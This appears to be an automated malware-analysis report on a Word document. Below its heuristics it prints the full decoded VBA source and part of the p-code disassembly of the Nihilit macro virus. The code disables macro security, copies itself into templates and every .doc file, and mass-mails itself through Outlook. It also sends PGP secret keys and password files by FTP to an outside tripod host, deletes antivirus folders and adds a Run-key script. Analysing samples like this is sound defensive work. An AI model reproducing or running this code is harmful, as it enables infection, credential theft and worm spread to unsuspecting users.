MALICIOUS
626
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
The sample contains malicious VBA macros, including AutoOpen and AutoClose functions, which are designed to execute automatically. The script utilizes WScript.Shell to construct and execute a command that archives a document named 'nihilit.doc' into 'Nihilit.zip' within the Windows directory. This indicates an attempt to download and exfiltrate or prepare a second-stage payload.
Heuristics 15
-
ClamAV: Win.Trojan.Kallisti-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Kallisti-1
-
VBA macros detected medium 10 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
VBA.Shell z & " -a -r " & w & "\Nihilit.zip" _ -
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Print #1, "Set WSHShell = WScript.CreateObject(""WScript.Shell"")" -
Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URLVBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.Matched line in script
VBA.Shell z & " -a -r " & w & "\Nihilit.zip" _ -
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Application.VBE.ActiveVBProject.VBComponents("nihilit").CodeModule.InsertLines PoLi, vbTab & "Rem " & A & vbTab & b & vbTab & c & vbTab & d & vbTab & e -
VBA email-worm self-replication (Outlook mass-mailer) critical OLE_VBA_EMAIL_WORM_SELF_REPLICATIONVBA macro drives Outlook to mass-mail itself: it automates Outlook.Application, programmatically creates a mail item, and spreads by harvests recipients from the MAPI address book / inbox, attaches a file to the outgoing message, sends the message programmatically. Harvesting recipients from the address book / inbox and auto-attaching the carrier to outgoing messages is the defining behavior of the Melissa / LoveLetter / W97M mass-mailer worm lineage — there is no benign document use, independent of any AV signature.Matched line in script
Set Ni_msg = Ni_OApp.CreateItem(0) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Print #1, "Set WSHShell = WScript.CreateObject(""WScript.Shell"")" -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
w = Environ("windir") -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://members.tripod.com/Nihilit/� Referenced by macro
- http://members.tripod.com/Nihilit/Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 45227 bytes |
SHA-256: 3e0b78525351e648b60febc8452c37c76f979ef2e33486fce954785546d4485b |
|||
|
Detection
ClamAV:
Win.Trojan.wmvg-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
If MacroContainer <> "Normal.dot" Then Call Cryptme
End Sub
Sub AutoClose()
On Error Resume Next
Randomize
sv = Int(Rnd * 3) + 1
If sv = 1 Then svt$ = "porno.doc"
If sv = 3 Then svt$ = "readme!.doc"
If sv = 2 Then svt$ = "sex.doc"
Call Nihilit
If MacroContainer <> "Normal.dot" Then Call Cryptme
If Left(ActiveDocument.Name, 8) <> "Document" And ActiveDocument.Saved = False Then ActiveDocument.Save
Call KillAV
z = Application.System.PrivateProfileString("", _
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows" & _
"\CurrentVersion\App Paths\winzip32.exe", "")
w = Environ("windir")
VBA.Shell z & " -a -r " & w & "\Nihilit.zip" _
& Chr(32) & w & "\nihilit.doc", vbHide
End Sub
Sub Nihilit()
On Error Resume Next
'thanks to jackie for some advanced code...
Word.Application.Options.VirusProtection = n
Word.Application.Options.ConfirmConversions = n
Word.Application.Options.SaveNormalPrompt = n
Application.DisplayAlerts = wdAlertsNone
Select Case Application.Version
Case "10.0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1&
CommandBars("Macro").Controls("Security...").Enabled = False
Case "9.0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
CommandBars("Macro").Controls("Security...").Enabled = False
End Select
WordBasic.DisableAutoMacros 0
Application.DisplayStatusBar = False
ActiveDocument.ReadOnlyRecommended = False
If GetAttr(ActiveDocument.FullName) = 1 Then
SetAttr ActiveDocument.FullName, 0
ActiveDocument.Reload
End If
Set Nor = NormalTemplate.VBProject.VBComponents
Set Doc = ActiveDocument.VBProject.VBComponents
DropFile = "C:\Windows\Nihilit.sys"
If Nor.Item("Nihilit").Name <> "Nihilit" Then
Doc("Nihilit").Export DropFile
Nor.Import DropFile
End If
If Doc.Item("Nihilit").Name <> "Nihilit" Then
Nor("Nihilit").Export DropFile
Doc.Import DropFile
ActiveDocument.Save
End If
SetAttr ActiveDocument.FullName, 1
Call Pgp
Call polyme
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Nihilit") = "C:\Windows\Backup.vbs"
Open "C:\Windows\Backup.vbs" For Output As #1
Print #1, "rem VBS.Backup for Nihilit Virus by Necronomikon"
Print #1, "On Error Resume Next"
Print #1, "Dim WSHShell"
Print #1, "Set WSHShell = WScript.CreateObject(""WScript.Shell"")"
Print #1, "WSHShell.RegWrite ""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security\AccessVBOM"", 1, ""REG_DWORD"""
Print #1, "WSHShell.RegWrite ""HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security\Level"", 1, ""REG_DWORD"""
Print #1, "WSHShell.RegWrite ""HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security\Level"", 1, ""REG_DWORD"""
Print #1, "Set Backup = WScript.CreateObject(""Word.Application"")"
Print #1, "Backup.Options.VirusProtection = (Rnd * 0)"
Print #1, "Backup.Options.SaveNormalPrompt = (Rnd * 0)"
Print #1, "Backup.NormalTemplate.VBProject.VBComponents.Remove Backup.NormalTemplate.VBProject.VBComponents(""Nihilit"")"
Print #1, "Backup.NormalTemplate.Save"
Print #1, "Backup.NormalTemplate.VBProject.VBComponents.Import (""C:\Windows\Nihilit.sys"")"
Print #1, "Set Search = Backup.Application.Filesearch"
Print #1, "Search.LookIn = ""C:\"": Search.SearchSubFolders = True: Search.FileName = ""*.doc"": Search.Execute"
Print #1, "For f = 1 To Search.FoundFiles.Count"
Print #1, "Victim = Search.FoundFiles(f)"
Print #1, "Backup.Documents.Open Victim"
Print #1, "Backup.ActiveDocument.VBProject.VBComponents.Remove Backup.ActiveDocument.VBProject.VBComponents("" & VirusName & "")"
Print #1, "Backup.ActiveDocument.VBProject.VBComponents.Import (""C:\Windows\Nihilit.sys"")"
Print #1, "Backup.ActiveDocument.Save"
Print #1, "Backup.ActiveDocument.Close"
Print #1, "Next"
Print #1, "Backup.Application.Quit"
Close #1
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Necronomikon\Nihilit", "Irc") = "True"
Call vIRC
If Day(Now) = Minute(Now) Then Selection.TypeText " You are Infected with Nihilit by Necronomikon/ZeroGravity"
ActiveDocument.SaveAs FileName:="C:\Windows\Nihilit.doc", FileFormat:=wdFormatDocument
Set Ni_OApp = CreateObject("Outlook.Application")
Set Ni_Mapi = Ni_OApp.GetNameSpace("MAPI")
For Each Ni_AddList In Ni_Mapi.AddressLists
Next
If Ni_AddList.AddressEntries.Count <> 0 Then
For Ni_AddListCount = 1 To Ni_AddList.AddressEntries.Count
Next
Set Ni_AddListEntry = Ni_AddList.AddressEntries(Ni_AddListCount)
Set Ni_msg = Ni_OApp.CreateItem(0)
Ni_msg.To = Ni_AddListEntry.Address
Ni_msg.Subject = "Check this!!!"
Ni_msg.Body = "I like this story!!!;o)." + vbCrLf + "Nihilit"
Ni_msg.Attachments.Add Environ("WINDIR") & "\Nihilit.doc"
Ni_msg.DeleteAfterSubmit = True
If Ni_msg.To <> "" Then
Ni_msg.Send
End If
End If
End Sub
Sub Pgp()
On Error Resume Next
'taken from W97M/Caligula Virus by Opic/CodeBreakers
If (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "Nihilit") = False) Then
pgppath = System.PrivateProfileString("", "HKEY_CLASSES_ROOT\PGP Encrypted File\shell\open\command", "")
Position = InStr(1, pgppath, "pgpt")
If Position <> 0 Then
pgppath = Mid(pgppath, 1, Position - 2)
Else
GoTo noPGP
End If
With Application.FileSearch
.FileName = "\Secring.skr"
.LookIn = pgppath
.SearchSubFolders = True
.MatchTextExactly = True
.FileType = msoFileTypeAllFiles
.Execute
PGP_Sec_Key = .FoundFiles(1)
End With
Randomize
For i = 1 To 4
NewSecRingFile = NewSecRingFile + Mid(Str(Int(8 * Rnd)), 2, 1)
Next i
NewSecRingFile = "./secring" & NewSecRingFile & ".skr"
Open "c:\sys.vxd" For Output As #1
Print #1, "ftp http://members.tripod.com/Nihilit/"
Print #1, "user nihilit"
Print #1, "pass killer"
Print #1, "cd incoming"
Print #1, "binary"
Print #1, "put """ & PGP_Sec_Key & """ """ & NewSecRingFile & """"
Print #1, "quit"
Close #1
Shell "command.com /c ftp.exe -n -s:c:\sys.vxd", vbHide
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "Nihilit") = True
End If
noPGP:
MsgBox "No PGP found on ya system!?", 64, "Eeeekkkk...."
Call Pwdstealer
End Sub
Sub Pwdstealer()
On Error Resume Next
With Application.FileSearch
.FileName = "*.pwl"
.LookIn = "c:"
.Execute
For i = 1 To .FoundFiles.Count
Shell "ftp http://members.tripod.com/Nihilit/", vbHide
Shell "nihilit", vbHide
Shell "killer", vbHide
Shell "post" & .FoundFiles(i), vbHide
Shell "bye", vbHide
Next i
End With
End Sub
'---- from NTVCK by me!;p -----
Sub KillAV()
On Error Resume Next
Kill "C:\Progra~1\AntiViral Toolkit Pro\*.*"
Kill "C:\Progra~1\Command Software\F-PROT95\*.*"
Kill "C:\Progra~1\FindVirus\*.*"
Kill "C:\Toolkit\FindVirus\*.*"
Kill "C:\Progra~1\Quick Heal\*.*"
Kill "C:\Progra~1\McAfee\VirusScan95\*.*"
Kill "C:\Progra~1\Norton AntiVirus\*.*"
Kill "C:\TBAVW95\*.*"
Kill "C:\VS95\*.*"
Kill "C:\eSafe\Protect\*.*"
Kill "C:\PC-Cillin 95\*.*"
Kill "C:\PC-Cillin 97\*.*"
Kill "C:\f-macro\*.*"
Kill "C:\Progra~1\FWIN32"
End Sub
Sub polyme()
On Error Resume Next
'Ultras Macro Polymorph
PoNu = Int(Rnd() * 28 + 1)
For Mutate = 1 To PoNu
PoRL = Application.VBE.ActiveVBProject.VBComponents("nihilit").CodeModule.CountOfLines
PoLi = Int(Rnd() * PoRL + 1)
A = Rnd * 455: b = Rnd * 80: c = Rnd * 160: d = Rnd * 180: e = Rnd * 49
Application.VBE.ActiveVBProject.VBComponents("nihilit").CodeModule.InsertLines PoLi, vbTab & "Rem " & A & vbTab & b & vbTab & c & vbTab & d & vbTab & e
Next Mutate
End Sub
Sub Cryptme()
On Error GoTo out
Selection.WholeStory
A$ = Selection
For a_ = 1 To Len(A$) Step 2
b$ = b$ + Mid(A$, a_ + 1, 1)
b$ = b$ + Mid(A$, a_, 1)
Next
Selection.TypeText Text:=b$
Selection.Range.Delete
Selection.HomeKey Unit:=wdStory, Extend:=wdMove
out:
End Sub
Sub vIRC()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Necronomikon\Nihilit", "Irc") <> "True" Then
End If
System.PrivateProfileString("", "HKEY_USERS\.Default\Software\MeGALiTH Software\Visual IRC96\Events", "Event17") = "dcc send $nick C:\Windows\Nihilit.zip"
End Sub
Sub ToolsOptions()
On Error Resume Next
Options.VirusProtection = 1
Options.SaveNormalPrompt = 1
Dialogs(wdDialogToolsOptions).Show
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
End Sub
Sub ToolsSecurity()
On Error Resume Next
CommandBars("Macro").Controls("Security...").Enabled = True
Dialogs(wdDialogToolsSecurity).Show
CommandBars("Macro").Controls("Security...").Enabled = False
Call polyme
End Sub
Sub FileTemplates()
On Error Resume Next
Call polyme
End Sub
Sub ToolsMacro()
On Error Resume Next
Call Stealth
Dialogs(wdDialogToolsMacro).Display
Call polyme
End Sub
Sub ViewVBCode()
On Error Resume Next
Call Stealth
ShowVisualBasicEditor = True
Call polyme
End Sub
Sub Stealth()
On Error Resume Next
Application.OrganizerDelete Source:=NormalTemplate.Name, _
Name:="Nihilit", Object:=wdOrganizerObjectProjectItems
Application.OrganizerDelete Source:=ActiveDocument.Name, _
Name:="Nihilit", Object:=wdOrganizerObjectProjectItems
NormalTemplate.Saved = True
ActiveDocument.Saved = True
End Sub
Sub HelpAbout()
On Error Resume Next
WordBasic.FileNew
WordBasic.ToggleFull
WordBasic.DocMaximize
WordBasic.Font "Comic Sans MS"
WordBasic.FontSize 60
WordBasic.Bold
WordBasic.Insert "Check this!"
WordBasic.StartOfLine
WordBasic.CharRight 1, 1
WordBasic.FormatFont Points:="48", Color:=6
WordBasic.EndOfLine
WordBasic.InsertPara
WordBasic.InsertPara
WordBasic.FontSize 48
WordBasic.Insert "Nihilit was coded by Necronomikon."
End Sub
Sub FileExit()
On Error Resume Next
Call Nihilit
If ActiveDocument.Saved = False Then ActiveDocument.Save
Application.WindowState = wdWindowStateMinimize
pName = CurDir & "\"
fName = Dir(pName & "*.doc", sAttr)
If (fName <> "") And ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call Nihilit
Do While (fName <> "")
fName = Dir()
If (fName <> "") And _
((fName <> ".") And (fName <> "..")) Then
InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call Nihilit
End If
Loop
ChangeFileOpenDirectory "p:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
ChangeFileOpenDirectory "h:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
ChangeFileOpenDirectory "f:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
Application.Quit
End Sub
Sub AutoExit()
On Error Resume Next
Call Nihilit
Application.WindowState = wdWindowStateMinimize
pName = CurDir & "\"
fName = Dir(pName & "*.doc", sAttr)
If (fName <> "") And ((fName <> ".") And (fName <> "..")) Then InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call Nihilit
Do While (fName <> "")
fName = Dir()
If (fName <> "") And _
((fName <> ".") And (fName <> "..")) Then
InfectDoc = pName & fName
Documents.Open FileName:=InfectDoc, ConfirmConversions:=False, ReadOnly:= _
False, AddToRecentFiles:=False, PasswordDocument:=""
Call Nihilit
End If
Loop
If ActiveDocument.Saved = False Then ActiveDocument.Save
ChangeFileOpenDirectory "p:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
ChangeFileOpenDirectory "r:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
ChangeFileOpenDirectory "s:"
ActiveDocument.SaveAs FileName:=svt$, LockComments:=False, Password:=", AddToRecentFiles:=False, WritePassword:=", ReadOnlyRecommended:=False
End Sub
' Processing file: /tmp/qstore_69plt3wc
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 21784 bytes
' Line #0:
' Line #1:
' FuncDefn (Sub AutoOpen())
' Line #2:
' Ld MacroContainer
' LitStr 0x000A "Normal.dot"
' Ne
' If
' BoSImplicit
' ArgsCall (Call) Cryptme 0x0000
' EndIf
' Line #3:
' EndSub
' Line #4:
' Line #5:
' FuncDefn (Sub AutoClose())
' Line #6:
' OnError (Resume Next)
' Line #7:
' ArgsCall Randomize 0x0000
' Line #8:
' Ld Rnd
' LitDI2 0x0003
' Mul
' FnInt
' LitDI2 0x0001
' Add
' St sv
' Line #9:
' Ld sv
' LitDI2 0x0001
' Eq
' If
' BoSImplicit
' LitStr 0x0009 "porno.doc"
' St svt$
' EndIf
' Line #10:
' Ld sv
' LitDI2 0x0003
' Eq
' If
' BoSImplicit
' LitStr 0x000B "readme!.doc"
' St svt$
' EndIf
' Line #11:
' Ld sv
' LitDI2 0x0002
' Eq
' If
' BoSImplicit
' LitStr 0x0007 "sex.doc"
' St svt$
' EndIf
' Line #12:
' ArgsCall (Call) Nihilit 0x0000
' Line #13:
' Line #14:
' Ld MacroContainer
' LitStr 0x000A "Normal.dot"
' Ne
' If
' BoSImplicit
' ArgsCall (Call) Cryptme 0x0000
' EndIf
' Line #15:
' Ld ActiveDocument
' MemLd Name
' LitDI2 0x0008
' ArgsLd Left 0x0002
' LitStr 0x0008 "Document"
' Ne
' Ld ActiveDocument
' MemLd Saved
' LitVarSpecial (False)
' Eq
' And
' If
' BoSImplicit
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' EndIf
' Line #16:
' ArgsCall (Call) KillAV 0x0000
' Line #17:
' Line #18:
' LineCont 0x0008 0A 00 00 00 0C 00 00 00
' LitStr 0x0000 ""
' LitStr 0x002D "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows"
' LitStr 0x0026 "\CurrentVersion\App Paths\winzip32.exe"
' Concat
' LitStr 0x0000 ""
' Ld Application
' MemLd System
' ArgsMemLd PrivateProfileString 0x0003
' St z
' Line #19:
' LitStr 0x0006 "windir"
' ArgsLd Environ 0x0001
' St w
' Line #20:
' LineCont 0x0004 0A 00 00 00
' Ld z
' LitStr 0x0007 " -a -r "
' Concat
' Ld w
' Concat
' LitStr 0x000C "\Nihilit.zip"
' Concat
' LitDI2 0x0020
' ArgsLd Chr 0x0001
' Concat
' Ld w
' Concat
' LitStr 0x000C "\nihilit.doc"
' Concat
' Ld vbHide
' Ld VBA
' ArgsMemCall Shell 0x0002
' Line #21:
' EndSub
' Line #22:
' Line #23:
' FuncDefn (Sub Nihilit())
' Line #24:
' OnError (Resume Next)
' Line #25:
' QuoteRem 0x0000 0x002A "thanks to jackie for some advanced code..."
' Line #26:
' Ld n
' Ld Word
' MemLd Application
' MemLd Options
' MemSt VirusProtection
' Line #27:
' Ld n
' Ld Word
' MemLd Application
' MemLd Options
' MemSt ConfirmConversions
' Line #28:
' Ld n
' Ld Word
' MemLd Application
' MemLd Options
' MemSt SaveNormalPrompt
' Line #29:
' Ld wdAlertsNone
' Ld Application
' MemSt DisplayAlerts
' Line #30:
' Line #31:
' Ld Application
' MemLd Version
' SelectCase
' Line #32:
' LitStr 0x0004 "10.0"
' Case
' CaseDone
' Line #33:
' LitDI4 0x0001 0x0000
' LitStr 0x0000 ""
' LitStr 0x003E "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security"
' LitStr 0x0005 "Level"
' Ld System
' ArgsMemSt PrivateProfileString 0x0003
' Line #34:
' LitDI4 0x0001 0x0000
' LitStr 0x0000 ""
' LitStr 0x003E "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security"
' LitStr 0x000A "AccessVBOM"
' Ld System
' ArgsMemSt PrivateProfileString 0x0003
' Line #35:
' LitVarSpecial (False)
' LitStr 0x000B "Security..."
' LitStr 0x0005 "Macro"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' MemSt Enabled
' Line #36:
' LitStr 0x0003 "9.0"
' Case
' CaseDone
' Line #37:
' LitDI4 0x0001 0x0000
' LitStr 0x0000 ""
' LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
' LitStr 0x0005 "Level"
' Ld System
' ArgsMemSt PrivateProfileString 0x0003
' Line #38:
' LitVarSpecial (False)
' LitStr 0x000B "Security..."
' LitStr 0x0005 "Macro"
' ArgsLd CommandBars 0x0001
' ArgsMemLd Controls 0x0001
' MemSt Enabled
' Line #39:
' EndSelect
' Line #40:
' LitDI2 0x0000
' Ld WordBasic
' ArgsMemCall DisableAutoMacros 0x0001
' Line #41:
' LitVarSpecial (False)
' Ld Application
' MemSt DisplayStatusBar
' Line #42:
' LitVarSpecial (False)
' Ld ActiveDocument
' MemSt ReadOnlyRecommended
' Line #43:
' Ld ActiveDocument
' MemLd FullName
' ArgsLd GetAttr 0x0001
' LitDI2 0x0001
' Eq
' IfBlock
' Line #44:
' Ld ActiveDocument
' MemLd FullName
' LitDI2 0x0000
' ArgsCall SetAttr 0x0002
' Line #45:
' Ld ActiveDocument
' ArgsMemCall Reload 0x0000
' Line #46:
' EndIfBlock
' Line #47:
' SetStmt
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' Set Nor
' Line #48:
' SetStmt
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' Set Doc
' Line #49:
' LitStr 0x0016 "C:\Windows\Nihilit.sys"
' St DropFile
' Line #50:
' LitStr 0x0007 "Nihilit"
' Ld Nor
' ArgsMemLd Item 0x0001
' MemLd Name
' LitStr 0x0007 "Nihilit"
' Ne
' IfBlock
' Line #51:
' Ld DropFile
' LitStr 0x0007 "Nihilit"
' ArgsLd Doc 0x0001
' ArgsMemCall Export 0x0001
' Line #52:
' Ld DropFile
' Ld Nor
' ArgsMemCall Import 0x0001
' Line #53:
' EndIfBlock
' Line #54:
' LitStr 0x0007 "Nihilit"
' Ld Doc
' ArgsMemLd Item 0x0001
' MemLd Name
' LitStr 0x0007 "Nihilit"
' Ne
' IfBlock
' Line #55:
' Ld DropFile
' LitStr 0x0007 "Nihilit"
' ArgsLd Nor 0x0001
' ArgsMemCall Export 0x0001
' Line #56:
' Ld DropFile
' Ld Doc
' ArgsMemCall Import 0x0001
' Line #57:
' Ld ActiveDocument
' ArgsMemCall Save 0x0000
' Line #58:
' EndIfBlock
' Line #59:
' Ld ActiveDocument
' MemLd FullName
' LitDI2 0x0001
' ArgsCall SetAttr 0x0002
' Line #60:
' ArgsCall (Call) Pgp 0x0000
' Line #61:
' ArgsCall (Call) polyme 0x0000
' Line #62:
' LitStr 0x0015 "C:\Windows\Backup.vbs"
' LitStr 0x0000 ""
' LitStr 0x0040 "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"
' LitStr 0x0007 "Nihilit"
' Ld System
' ArgsMemSt PrivateProfileString 0x0003
' Line #63:
' LitStr 0x0015 "C:\Windows\Backup.vbs"
' LitDI2 0x0001
' Sharp
' LitDefault
' Open (For Output)
' Line #64:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0030 "rem VBS.Backup for Nihilit Virus by Necronomikon"
' PrintItemNL
' Line #65:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0014 "On Error Resume Next"
' PrintItemNL
' Line #66:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x000C "Dim WSHShell"
' PrintItemNL
' Line #67:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0034 "Set WSHShell = WScript.CreateObject("WScript.Shell")"
' PrintItemNL
' Line #68:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x006D "WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security\AccessVBOM", 1, "REG_DWORD""
' PrintItemNL
' Line #69:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0068 "WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security\Level", 1, "REG_DWORD""
' PrintItemNL
' Line #70:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0067 "WSHShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security\Level", 1, "REG_DWORD""
' PrintItemNL
' Line #71:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0035 "Set Backup = WScript.CreateObject("Word.Application")"
' PrintItemNL
' Line #72:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x002A "Backup.Options.VirusProtection = (Rnd * 0)"
' PrintItemNL
' Line #73:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x002B "Backup.Options.SaveNormalPrompt = (Rnd * 0)"
' PrintItemNL
' Line #74:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x006B "Backup.NormalTemplate.VBProject.VBComponents.Remove Backup.NormalTemplate.VBProject.VBComponents("Nihilit")"
' PrintItemNL
' Line #75:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x001A "Backup.NormalTemplate.Save"
' PrintItemNL
' Line #76:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x004E "Backup.NormalTemplate.VBProject.VBComponents.Import ("C:\Windows\Nihilit.sys")"
' PrintItemNL
' Line #77:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x002A "Set Search = Backup.Application.Filesearch"
' PrintItemNL
' Line #78:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0060 "Search.LookIn = "C:\": Search.SearchSubFolders = True: Search.FileName = "*.doc": Search.Execute"
' PrintItemNL
' Line #79:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0024 "For f = 1 To Search.FoundFiles.Count"
' PrintItemNL
' Line #80:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x001D "Victim = Search.FoundFiles(f)"
' PrintItemNL
' Line #81:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x001C "Backup.Documents.Open Victim"
' PrintItemNL
' Line #82:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0073 "Backup.ActiveDocument.VBProject.VBComponents.Remove Backup.ActiveDocument.VBProject.VBComponents(" & VirusName & ")"
' PrintItemNL
' Line #83:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x004E "Backup.ActiveDocument.VBProject.VBComponents.Import ("C:\Windows\Nihilit.sys")"
' PrintItemNL
' Line #84:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x001A "Backup.ActiveDocument.Save"
' PrintItemNL
' Line #85:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x001B "Backup.ActiveDocument.Close"
' PrintItemNL
' Line #86:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0004 "Next"
' PrintItemNL
' Line #87:
' LitDI2 0x0001
' Sharp
' PrintChan
' LitStr 0x0017 "Backup.Application.Quit"
' PrintItemNL
' Line #88:
' LitDI2 0x0001
' Sharp
' Close 0x0001
' Line #89:
' LitStr 0x0004 "True"
' LitStr 0x0000 ""
' LitStr 0x0030 "HKEY_LOCAL_MACHINE\Software\Necronomikon\Nihilit"
' LitStr 0x0003 "Irc"
' Ld System
' ArgsMemSt PrivateProfileString 0x0003
' Line #90:
' ArgsCall (Call) vIRC 0x0000
' Line #91:
' Ld Now
' ArgsLd Day 0x0001
' Ld Now
' ArgsLd Minute 0x0001
' Eq
' If
' BoSImplicit
' LitStr 0x003A " You are Infected with Nihilit by Necronomikon/ZeroGravity"
' Ld Selection
' ArgsMemCall TypeText 0x0001
' EndIf
' Line #92:
